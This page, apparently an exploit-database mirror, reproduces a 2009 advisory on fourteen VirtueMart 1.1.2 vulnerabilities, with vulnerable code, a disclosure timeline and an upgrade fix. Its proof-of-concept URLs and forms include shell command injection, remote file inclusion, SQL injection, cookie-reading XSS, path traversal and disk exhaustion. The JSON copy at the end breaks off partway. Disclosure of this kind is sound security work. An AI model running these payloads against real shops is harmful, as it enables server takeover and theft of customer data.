Search...

virtuemart <= 1.1.2 - Multiple Vulnerabilities

2014-07-01T00:00:00

ID SSV:66411
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Author: Janek Vind &#34;waraxe&#34;
Date: 24. January 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-71.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VirtueMart is an Open Source E-Commerce solution to be used together with a
Content Management System (CMS) called Joomla! (and Mambo). Joomla! and
VirtueMart are written in PHP and made easy for use in a PHP/MySQL environment.

Homepage: http://virtuemart.net/

VirtueMart Joomla eCommerce Edition is affected by same vulnerabilities.


List of found vulnerabilities
===============================================================================

1. Remote Shell Command Execution in &#34;shop.pdf_output.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: high
Preconditions:
1. *nix (non-Windows) server
2. file &#34;/usr/bin/htmldoc&#34; must exist

Problematic source code:
-----------------------------------------------------------
$showpage = vmGet( $_REQUEST, &#39;showpage&#39;);
...
if (@file_exists( &#34;/usr/bin/htmldoc&#34; )) {

$load_page = $mosConfig_live_site . &#34;/index2.php?option=com_virtuemart&
page=$showpage&flypage=$flypage&product_id=$product_id
&category_id=$category_id&pop=1&hide_js=1&output=pdf&#34;;
...
passthru( &#34;/usr/bin/htmldoc --no-localfiles --quiet -t pdf14 --jpeg
--webpage --header t.D --footer ./. --size letter --left 0.5in &#39;$load_page&#39;&#34; );
-----------------------------------------------------------

As seen from code snippet above, user submitted parameter &#34;showpage&#34;
is used in unsafe manner without proper sanitization in interaction with
operating system shell. This vulnerability allows an attacker to execute
remote shell commands on the target server.

Example attack url:

http://localhost/virtuemart112/index.php?page=shop.pdf_output
&option=com_virtuemart&showpage=&#39;;[shell command]



2. Remote File Inclusion in &#34;show_image_in_imgtag.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: high
Preconditions:
1. register_globals=on
2. allow_url_fopen=on (PHP &#60; 5.2.0)
3. allow_url_include=on (PHP &#62;= 5.2.0)

Test:

http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?
mosConfig_absolute_path=http://www.waraxe.us


3. Remote File Inclusion in &#34;export.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: high
Preconditions:
1. register_globals=on
2. allow_url_fopen=on (PHP &#60; 5.2.0)
3. allow_url_include=on (PHP &#62;= 5.2.0)

Test:

http://localhost/virtuemart112/administrator/components/com_virtuemart/export.php?
mosConfig_absolute_path=http://www.waraxe.us



4. Sql Injection in &#34;shop_browse_queries.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: high
Preconditions: none
Comments:
1. This is blind sql injection

Test 1:

http://localhost/virtuemart112/index.php?page=shop.browse
&option=com_virtuemart&DescOrderBy=waraxe

Result (with Debug mode turned on):

500 - JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the
right syntax to use near &#39;waraxe LIMIT 0, 20&#39; at line 11

Test 2:

http://localhost/virtuemart112/index.php?DescOrderBy=
,BENCHMARK(1000000,MD5(123))&option=com_virtuemart&page=shop.browse

Result: response delay as expected


Problematic source code:
----------------------------------------------
// Descending or Ascending Order? possible values: [ASC|DESC]
$DescOrderBy = $vmInputFilter-&#62;safeSQL( $vm_mainframe-&#62;getUserStateFromRequest
( &#34;browse{$keyword}{$category_id}{$manufacturer_id}DescOrderBy&#34;, &#39;DescOrderBy&#39;, &#34;ASC&#34; ) );
...
$q .= &#34;
ORDER BY $orderbyField $DescOrderBy&#34;;
...
$list .= $q . &#34; LIMIT $limitstart, &#34; . $limit;
...
$db_browse-&#62;query( $list );
----------------------------------------------

Use of &#34;safeSQL()&#34; does not make it secure!



5. Reflected XSS in &#34;shop.downloads.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions: none

Test:

http://localhost/virtuemart112/index.php?func=downloadRequest&option=com_virtuemart
&page=shop.downloads&download_id=&#34;&#62;&#60;script&#62;alert(document.cookie);&#60;/script&#62;


6. Reflected XSS in &#34;mod_virtuemart_currencies.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
1. Currency Selector module must be enabled

Test:

http://localhost/virtuemart112/?&#34;&#62;&#60;script&#62;alert(123);&#60;/script&#62;

Problematic source code:
----------------------------------------------
if( !empty( $_POST )) {
foreach( $_POST as $key =&#62; $val ) {
if( $key == &#39;product_currency&#39; || is_array($val) ) continue;
$val = htmlspecialchars($val, ENT_QUOTES);
echo &#34;&#60;input type=&#34;hidden&#34; name=&#34;$key&#34; value=&#34;$val&#34; /&#62;
&#34;;
}
}
elseif( !empty( $_GET )) {
foreach( $_GET as $key =&#62; $val ) {
if( $key == &#39;product_currency&#39; || is_array($val) ) continue;
echo &#34;&#60;input type=&#34;hidden&#34; name=&#34;$key&#34;
value=&#34;&#34;.htmlspecialchars($val, ENT_QUOTES).&#34;&#34; /&#62;
&#34;;
}
}
----------------------------------------------



7. Reflected XSS in &#34;notify.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions: none

Test goes through POST, using html like this:
----------------------------------------------
&#60;html&#62;&#60;body&#62;&#60;center&#62;
&#60;form action=&#34;http://localhost/virtuemart112/administrator/
components/com_virtuemart/notify.php&#34; method=&#34;post&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;waraxe&#34; value=
&#34;&#60;script&#62;alert(document.cookie);&#60;/script&#62;&#34;&#62;
&#60;input type=&#34;submit&#34; value=&#34;Test!&#34;&#62;
&#60;/form&#62;
&#60;/center&#62;&#60;/body&#62;&#60;/html&#62;
----------------------------------------------


8. Sql Injection in &#34;mod_virtuemart_manufacturers.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
1. Manufacturers module must be enabled
2. magic_quotes_gpc=off

Test:

http://localhost/virtuemart112/?category_id=zzz&#39;+UNION+SELECT+1,@@version%23

Problematic source code:
----------------------------------------------
$category_id = vmGet( $_REQUEST, &#39;category_id&#39;, &#39;&#39; );
...
$query = &#34;SELECT DISTINCT m.manufacturer_id, m.mf_name
FROM #__{vm}_manufacturer m
...
WHERE cx.category_id = &#39;$category_id&#39; &#34;;
----------------------------------------------


9. Local File Inclusion in &#34;store.shipping_module_form.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions:
1. attacker must have VirtueMart administration privileges

Problematic source code:
----------------------------------------------
$shipping_module = vmGet($_REQUEST, &#39;shipping_module&#39;, null);

if( $shipping_module ) {
if( !include( CLASSPATH.&#34;shipping/$shipping_module&#34; )) {
----------------------------------------------

Test:

http://localhost/virtuemart112/administrator/index.php?
page=store.shipping_module_form&shipping_module=
../../../../../configuration.php&option=com_virtuemart

Result:

Fatal error: Cannot redeclare class JConfig in
C:apache_wwwrootvirtuemart112configuration.php on line 2

So it&#39;s classical LFI (Local File Inclusion) security vulnerability,
but it&#39;s exploitable only by attacker with admin privileges.
Therefore security impact can be considered as low.


10. Sql Injection in shipping administration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions:
1. attacker must have Virtuemart administration privileges
2. magic_quotes_gpc=off

Some examples (actually there are more sql injections)
--------------------------------------------------------------
function add(&$d) {
...
$q = &#34;INSERT INTO #__{vm}_shipping_carrier
(shipping_carrier_name, shipping_carrier_list_order) VALUES (&#39;&#34;;
$q .= $d[&#34;shipping_carrier_name&#34;] . &#34;&#39;,&#39;&#34;;
$q .= $d[&#34;shipping_carrier_list_order&#34;] . &#34;&#39;)&#34;;
...
function update(&$d) {
...
$q = &#34;UPDATE #__{vm}_shipping_carrier SET &#34;;
$q .= &#34;shipping_carrier_name=&#39;&#34; . $d[&#34;shipping_carrier_name&#34;];
$q .= &#34;&#39;,shipping_carrier_list_order=&#39;&#34; . $d[&#34;shipping_carrier_list_order&#34;];
$q .= &#34;&#39; WHERE shipping_carrier_id=&#39;&#34; . $d[&#34;shipping_carrier_id&#34;].&#34;&#39;&#34;;
...
function delete_record( $record_id, &$d ) {
...
$q = &#34;DELETE FROM #__{vm}_shipping_carrier WHERE
shipping_carrier_id=&#39;$record_id&#39;&#34;;
$db-&#62;query($q);
--------------------------------------------------------------

Test 1:

1. open &#34;Shipper edit/create form:
http://localhost/virtuemart112/administrator/index.php?pshop_mode=admin&
page=shipping.carrier_form&option=com_virtuemart

2. Insert this test string to &#34;Shipper Company&#34; input: war&#39;axe

Result: 500 - An error has occurred.

JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax
to use near &#39;axe&#39;,&#39;&#39;)&#39; at line 1 SQL=INSERT INTO jos_vm_shipping_carrier
(shipping_carrier_name, shipping_carrier_list_order) VALUES (&#39;war&#39;axe&#39;,&#39;&#39;)

Test 2 (vmtoken must be valid):

1. http://localhost/virtuemart112/administrator/index.php?page=shipping.carrier_list&
func=carrierDelete&shipping_carrier_id=war%27axe&keyword=&limitstart=0
&no_menu=0&option=com_virtuemart&vmtoken=2c807c5076c5504fb3c3b5bfea415103

Result:
500 - An error has occurred.

JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to
use near &#39;axe&#39;&#39; at line 1 SQL=SELECT shipping_rate_carrier_id FROM
jos_vm_shipping_rate WHERE shipping_rate_carrier_id=&#39;war&#39;axe&#39;


11. Disk Space Exhaustion in &#34;show_image_in_imgtag.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions: none

Tests:

http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?
filename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=2000&newysize=2000

http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?
filename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=1999&newysize=2000

http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?
filename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=1998&newysize=2000

After tests it can be found, that directory
&#34;components/com_virtuemart/shop_image/product/resized/&#34; contains resized
images according to previous test requests. As filesize of images can be
&#62;1MB per file, then it&#39;s easy to make thousands of specially crafted requests
and waste server&#39;s disk space till quota is exceeded. No authentication
needed, no other mitigating factors.


12. Sql Injection in &#34;shop.feed.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions: none


Test URL:
http://localhost/virtuemart112/index.php?page=shop.feed&option=com_virtuemart
&limit=1waraxe

Resulting error message (with debug turned on):

500 - JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use
near &#39;1waraxe&#39; at line 7 SQL=SELECT DISTINCT(product_sku), p.product_id, product_name,
product_thumb_image, product_s_desc as description, p.cdate, p.mdate, c.category_name,
c.category_id, category_flypage FROM jos_vm_product p, jos_vm_category c,
jos_vm_product_category_xref cx WHERE product_publish = &#39;Y&#39; AND product_parent_id=&#39;0&#39;
AND c.category_id = cx.category_id AND cx.product_id = p.product_id
ORDER BY mdate DESC LIMIT 0, 1waraxe

As sql injection occurs in LIMIT part of the query, then probably
it&#39;s not exploitable in current situation.


13. Reflected XSS and hash disclosure in &#34;shop.debug.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
1. Victim must be logged in as user


Test URL:

http://localhost/virtuemart112/index.php?page=shop.debug&option=com_virtuemart
&Itemid=64&&#60;script&#62;alert(123);&#60;/script&#62;

Test shows, that we have classic Reflected XSS case. But this
is not all :)
Let&#39;s log in as user and then issue request:

http://localhost/virtuemart112/index.php?page=shop.debug&option=com_virtuemart
&Itemid=64

Resulting debug page has &#34;Global Variables&#34; tab, let&#39;s click it.
Wow ... we can see password&#39;s hash and salt:

[user] =&#62; JUser Object
(
[id] =&#62; 62
[name] =&#62; test
[username] =&#62; test
[email] =&#62; *****@yahoo.com
[password] =&#62; 0c90b********bbf4:ISug*****6YN9Yg
[password_clear] =&#62;

There is no need for such information disclosure! In combination
with Reflected XSS, shown before, attacker is able to steal victim&#39;s
password hash and salt.

Suggestion - removing sensitive information from debug page.


14. Sql Injection in &#34;product.product_move.php&#34;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions:
1. attacker must have VirtueMart administration privileges

Problematic source code:
----------------------------------------------------------------
$products = vmGet( $_POST, &#39;product_id&#39; );
$count= count( $products );
...
for( $i=0; $i &#60; $count; $i++ ) {
$products[$i] = intval($products[$i]);
...
$db-&#62;query( &#39;SELECT `product_name` FROM `#__{vm}_product` WHERE `product_id`
IN(&#39;.implode(&#39;,&#39;, $products).&#39;) ORDER BY `product_name`&#39;);
----------------------------------------------------------------

At first glance it seems to be secure code because of &#34;intval()&#34;.
But what happens in case of arrays with non-numeric indexes? Example:

product_id[w] = waraxe

Testing is possible via POST request, so special html file is needed:
----------------------------------------------------------------
&#60;html&#62;&#60;body&#62;&#60;center&#62;
&#60;form action=&#34;http://localhost/virtuemart112/administrator/index.php?
option=com_virtuemart&#34; method=&#34;post&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;pshop_mode&#34; value=&#34;admin&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;page&#34; value=&#34;product.product_move&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;product_id[w]&#34; value=&#34;waraxe&#34;&#62;
&#60;input type=&#34;submit&#34; value=&#34;Test!&#34;&#62;
&#60;/form&#62;
&#60;/center&#62;&#60;/body&#62;&#60;/html&#62;
-----------------------------------------------------------------

Resulting error message (debugging is enabled):

JDatabaseMySQL::query: 1054 - Unknown column &#39;waraxe&#39; in &#39;where clause&#39;
SQL=SELECT `product_name` FROM `jos_vm_product` WHERE `product_id`
IN(waraxe,0) ORDER BY `product_name`


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Upgrade to new version 1.1.3 ASAP


Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

11/27/08 Developer contacted
11/27/08 Developer&#39;s initial response
11/28/08 Fidings sent to developer
01/22/09 Patched version 1.1.3 released by developer
01/24/09 Public disclosure

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind &#34;waraxe&#34;

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ---------------------------------

# milw0rm.com [2009-03-31]

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T15:04:23", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2017-11-19T15:04:23", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T15:04:23", "rev": 2}, "vulnersScore": -0.2}, "href": "https://www.seebug.org/vuldb/ssvid-66411", "references": [], "enchantments_done": [], "id": "SSV:66411", "title": "virtuemart <= 1.1.2 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n Author: Janek Vind "waraxe"\nDate: 24. January 2009\nLocation: Estonia, Tartu\nWeb: http://www.waraxe.us/advisory-71.html\n\n\nDescription of vulnerable software:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nVirtueMart is an Open Source E-Commerce solution to be used together with a\nContent Management System (CMS) called Joomla! (and Mambo). Joomla! and\nVirtueMart are written in PHP and made easy for use in a PHP/MySQL environment.\n\nHomepage: http://virtuemart.net/\n\nVirtueMart Joomla eCommerce Edition is affected by same vulnerabilities.\n\n\nList of found vulnerabilities\n===============================================================================\n\n1. Remote Shell Command Execution in "shop.pdf_output.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: high\nPreconditions:\n1. *nix (non-Windows) server\n2. file "/usr/bin/htmldoc" must exist\n\nProblematic source code:\n-----------------------------------------------------------\n$showpage = vmGet( $_REQUEST, 'showpage');\n...\nif (@file_exists( "/usr/bin/htmldoc" )) {\n\n$load_page = $mosConfig_live_site . "/index2.php?option=com_virtuemart&\npage=$showpage&flypage=$flypage&product_id=$product_id\n&category_id=$category_id&pop=1&hide_js=1&output=pdf";\n...\npassthru( "/usr/bin/htmldoc --no-localfiles --quiet -t pdf14 --jpeg\n--webpage --header t.D --footer ./. --size letter --left 0.5in '$load_page'" );\n-----------------------------------------------------------\n\nAs seen from code snippet above, user submitted parameter "showpage"\nis used in unsafe manner without proper sanitization in interaction with\noperating system shell. This vulnerability allows an attacker to execute\nremote shell commands on the target server.\n\nExample attack url:\n\nhttp://localhost/virtuemart112/index.php?page=shop.pdf_output\n&option=com_virtuemart&showpage=';[shell command]\n\n\n\n2. Remote File Inclusion in "show_image_in_imgtag.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: high\nPreconditions:\n1. register_globals=on\n2. allow_url_fopen=on (PHP < 5.2.0)\n3. allow_url_include=on (PHP >= 5.2.0)\n\nTest:\n\nhttp://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?\nmosConfig_absolute_path=http://www.waraxe.us\n\n\n3. Remote File Inclusion in "export.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: high\nPreconditions:\n1. register_globals=on\n2. allow_url_fopen=on (PHP < 5.2.0)\n3. allow_url_include=on (PHP >= 5.2.0)\n\nTest:\n\nhttp://localhost/virtuemart112/administrator/components/com_virtuemart/export.php?\nmosConfig_absolute_path=http://www.waraxe.us\n\n\n\n4. Sql Injection in "shop_browse_queries.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: high\nPreconditions: none\nComments:\n1. This is blind sql injection\n\nTest 1:\n\nhttp://localhost/virtuemart112/index.php?page=shop.browse\n&option=com_virtuemart&DescOrderBy=waraxe\n\nResult (with Debug mode turned on):\n\n500 - JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax;\ncheck the manual that corresponds to your MySQL server version for the\nright syntax to use near 'waraxe LIMIT 0, 20' at line 11\n\nTest 2:\n\nhttp://localhost/virtuemart112/index.php?DescOrderBy=\n,BENCHMARK(1000000,MD5(123))&option=com_virtuemart&page=shop.browse\n\nResult: response delay as expected\n\n\nProblematic source code:\n----------------------------------------------\n// Descending or Ascending Order? possible values: [ASC|DESC]\n$DescOrderBy = $vmInputFilter->safeSQL( $vm_mainframe->getUserStateFromRequest\n( "browse{$keyword}{$category_id}{$manufacturer_id}DescOrderBy", 'DescOrderBy', "ASC" ) );\n...\n$q .= "\nORDER BY $orderbyField $DescOrderBy";\n...\n$list .= $q . " LIMIT $limitstart, " . $limit;\n...\n$db_browse->query( $list );\n----------------------------------------------\n\nUse of "safeSQL()" does not make it secure!\n\n\n\n5. Reflected XSS in "shop.downloads.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: medium\nPreconditions: none\n\nTest:\n\nhttp://localhost/virtuemart112/index.php?func=downloadRequest&option=com_virtuemart\n&page=shop.downloads&download_id="><script>alert(document.cookie);</script>\n\n\n6. Reflected XSS in "mod_virtuemart_currencies.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: medium\nPreconditions:\n1. Currency Selector module must be enabled\n\nTest:\n\nhttp://localhost/virtuemart112/?"><script>alert(123);</script>\n\nProblematic source code:\n----------------------------------------------\nif( !empty( $_POST )) {\nforeach( $_POST as $key => $val ) {\nif( $key == 'product_currency' || is_array($val) ) continue;\n$val = htmlspecialchars($val, ENT_QUOTES);\necho "<input type="hidden" name="$key" value="$val" />\n";\n}\n}\nelseif( !empty( $_GET )) {\nforeach( $_GET as $key => $val ) {\nif( $key == 'product_currency' || is_array($val) ) continue;\necho "<input type="hidden" name="$key"\nvalue="".htmlspecialchars($val, ENT_QUOTES)."" />\n";\n}\n}\n----------------------------------------------\n\n\n\n7. Reflected XSS in "notify.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: medium\nPreconditions: none\n\nTest goes through POST, using html like this:\n----------------------------------------------\n<html><body><center>\n<form action="http://localhost/virtuemart112/administrator/\ncomponents/com_virtuemart/notify.php" method="post">\n<input type="hidden" name="waraxe" value=\n"<script>alert(document.cookie);</script>">\n<input type="submit" value="Test!">\n</form>\n</center></body></html>\n----------------------------------------------\n\n\n8. Sql Injection in "mod_virtuemart_manufacturers.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: medium\nPreconditions:\n1. Manufacturers module must be enabled\n2. magic_quotes_gpc=off\n\nTest:\n\nhttp://localhost/virtuemart112/?category_id=zzz'+UNION+SELECT+1,@@version%23\n\nProblematic source code:\n----------------------------------------------\n$category_id = vmGet( $_REQUEST, 'category_id', '' );\n...\n$query = "SELECT DISTINCT m.manufacturer_id, m.mf_name\nFROM #__{vm}_manufacturer m\n...\nWHERE cx.category_id = '$category_id' ";\n----------------------------------------------\n\n\n9. Local File Inclusion in "store.shipping_module_form.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: low\nPreconditions:\n1. attacker must have VirtueMart administration privileges\n\nProblematic source code:\n----------------------------------------------\n$shipping_module = vmGet($_REQUEST, 'shipping_module', null);\n\nif( $shipping_module ) {\nif( !include( CLASSPATH."shipping/$shipping_module" )) {\n----------------------------------------------\n\nTest:\n\nhttp://localhost/virtuemart112/administrator/index.php?\npage=store.shipping_module_form&shipping_module=\n../../../../../configuration.php&option=com_virtuemart\n\nResult:\n\nFatal error: Cannot redeclare class JConfig in\nC:apache_wwwrootvirtuemart112configuration.php on line 2\n\nSo it's classical LFI (Local File Inclusion) security vulnerability,\nbut it's exploitable only by attacker with admin privileges.\nTherefore security impact can be considered as low.\n\n\n10. Sql Injection in shipping administration\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: low\nPreconditions:\n1. attacker must have Virtuemart administration privileges\n2. magic_quotes_gpc=off\n\nSome examples (actually there are more sql injections)\n--------------------------------------------------------------\nfunction add(&$d) {\n...\n$q = "INSERT INTO #__{vm}_shipping_carrier\n(shipping_carrier_name, shipping_carrier_list_order) VALUES ('";\n$q .= $d["shipping_carrier_name"] . "','";\n$q .= $d["shipping_carrier_list_order"] . "')";\n...\nfunction update(&$d) {\n...\n$q = "UPDATE #__{vm}_shipping_carrier SET ";\n$q .= "shipping_carrier_name='" . $d["shipping_carrier_name"];\n$q .= "',shipping_carrier_list_order='" . $d["shipping_carrier_list_order"];\n$q .= "' WHERE shipping_carrier_id='" . $d["shipping_carrier_id"]."'";\n...\nfunction delete_record( $record_id, &$d ) {\n...\n$q = "DELETE FROM #__{vm}_shipping_carrier WHERE\nshipping_carrier_id='$record_id'";\n$db->query($q);\n--------------------------------------------------------------\n\nTest 1:\n\n1. open "Shipper edit/create form:\nhttp://localhost/virtuemart112/administrator/index.php?pshop_mode=admin&\npage=shipping.carrier_form&option=com_virtuemart\n\n2. Insert this test string to "Shipper Company" input: war'axe\n\nResult: 500 - An error has occurred.\n\nJDatabaseMySQL::query: 1064 - You have an error in your SQL syntax;\ncheck the manual that corresponds to your MySQL server version for the right syntax\nto use near 'axe','')' at line 1 SQL=INSERT INTO jos_vm_shipping_carrier\n(shipping_carrier_name, shipping_carrier_list_order) VALUES ('war'axe','')\n\nTest 2 (vmtoken must be valid):\n\n1. http://localhost/virtuemart112/administrator/index.php?page=shipping.carrier_list&\nfunc=carrierDelete&shipping_carrier_id=war%27axe&keyword=&limitstart=0\n&no_menu=0&option=com_virtuemart&vmtoken=2c807c5076c5504fb3c3b5bfea415103\n\nResult:\n500 - An error has occurred.\n\nJDatabaseMySQL::query: 1064 - You have an error in your SQL syntax;\ncheck the manual that corresponds to your MySQL server version for the right syntax to\nuse near 'axe'' at line 1 SQL=SELECT shipping_rate_carrier_id FROM\njos_vm_shipping_rate WHERE shipping_rate_carrier_id='war'axe'\n\n\n11. Disk Space Exhaustion in "show_image_in_imgtag.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: low\nPreconditions: none\n\nTests:\n\nhttp://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?\nfilename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=2000&newysize=2000\n\nhttp://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?\nfilename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=1999&newysize=2000\n\nhttp://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?\nfilename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=1998&newysize=2000\n\nAfter tests it can be found, that directory\n"components/com_virtuemart/shop_image/product/resized/" contains resized\nimages according to previous test requests. As filesize of images can be\n>1MB per file, then it's easy to make thousands of specially crafted requests\nand waste server's disk space till quota is exceeded. No authentication\nneeded, no other mitigating factors.\n\n\n12. Sql Injection in "shop.feed.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: low\nPreconditions: none\n\n\nTest URL:\nhttp://localhost/virtuemart112/index.php?page=shop.feed&option=com_virtuemart\n&limit=1waraxe\n\nResulting error message (with debug turned on):\n\n500 - JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax;\ncheck the manual that corresponds to your MySQL server version for the right syntax to use\nnear '1waraxe' at line 7 SQL=SELECT DISTINCT(product_sku), p.product_id, product_name,\nproduct_thumb_image, product_s_desc as description, p.cdate, p.mdate, c.category_name,\nc.category_id, category_flypage FROM jos_vm_product p, jos_vm_category c,\njos_vm_product_category_xref cx WHERE product_publish = 'Y' AND product_parent_id='0'\nAND c.category_id = cx.category_id AND cx.product_id = p.product_id\nORDER BY mdate DESC LIMIT 0, 1waraxe\n\nAs sql injection occurs in LIMIT part of the query, then probably\nit's not exploitable in current situation.\n\n\n13. Reflected XSS and hash disclosure in "shop.debug.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: medium\nPreconditions:\n1. Victim must be logged in as user\n\n\nTest URL:\n\nhttp://localhost/virtuemart112/index.php?page=shop.debug&option=com_virtuemart\n&Itemid=64&<script>alert(123);</script>\n\nTest shows, that we have classic Reflected XSS case. But this\nis not all :)\nLet's log in as user and then issue request:\n\nhttp://localhost/virtuemart112/index.php?page=shop.debug&option=com_virtuemart\n&Itemid=64\n\nResulting debug page has "Global Variables" tab, let's click it.\nWow ... we can see password's hash and salt:\n\n[user] => JUser Object\n(\n[id] => 62\n[name] => test\n[username] => test\n[email] => *****@yahoo.com\n[password] => 0c90b********bbf4:ISug*****6YN9Yg\n[password_clear] =>\n\nThere is no need for such information disclosure! In combination\nwith Reflected XSS, shown before, attacker is able to steal victim's\npassword hash and salt.\n\nSuggestion - removing sensitive information from debug page.\n\n\n14. Sql Injection in "product.product_move.php"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSecurity risk: low\nPreconditions:\n1. attacker must have VirtueMart administration privileges\n\nProblematic source code:\n----------------------------------------------------------------\n$products = vmGet( $_POST, 'product_id' );\n$count= count( $products );\n...\nfor( $i=0; $i < $count; 